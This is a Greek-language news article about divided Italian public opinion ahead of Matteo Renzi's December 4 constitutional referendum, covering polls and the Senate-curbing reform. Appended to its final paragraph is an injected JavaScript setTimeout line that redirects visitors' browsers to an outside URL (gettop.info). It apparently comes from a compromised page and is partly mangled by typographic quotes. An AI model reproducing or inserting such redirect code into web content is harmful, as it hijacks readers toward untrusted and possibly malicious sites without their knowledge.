Διχασμένη η Ιταλία έναν μήνα πριν από το δημοψήφισμα

0
11

 

Αντίστροφη μέτρηση για το συνταγματικό δημοψήφισμα που είναι σε περίπου έναν μήνα στην Ιταλία και οι πολίτες δείχνουν διχασμένοι. Το «όχι» προηγείται κατά 2 έως 4 ποσοστιαίες μονάδες του «ναι», αλλά ο αριθμός των αναποφάσιστων ανέρχεται σε περίπου 20%.

Η μεταρρύθμιση που επιδιώκει ο Ματέο Ρέντσι, έχει ως στόχο την απλοποίηση της νομοθετικής διαδικασίας και την ενίσχυση της πολιτικής σταθερότητας σε μία χώρα που έχει γνωρίσει 60 κυβερνήσεις από το 1946, περιορίζοντας δραστικά την εξουσία της Γερουσίας.

«Το δημοψήφισμα δεν αποτελεί σημείο κατάληξης, αλλά σημείο εκκίνησης» για τον εκσυγχρονισμό της Ιταλίας, επανέλαβε ο Ματέο Ρέντσι ενώπιον δεκάδων χιλιάδων υποστηρικτών του που είχαν συγκεντρωθεί στη Ρώμη.

Όταν το νομοσχέδιο εγκρίθηκε τον περασμένο Απρίλιο, έπειτα από σειρά πέρα δώθε ανάμεσα στα δύο σώματα του ιταλικού Κοινοβουλίου, ο Ματέο Ρέντσι ανακοίνωσε ότι θα υποβάλει σε δημοψήφισμα την 4η Δεκεμβρίου τη μεταρρύθμιση και ότι σε περίπτωση αρνητικής ψήφου θα παραιτηθεί. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here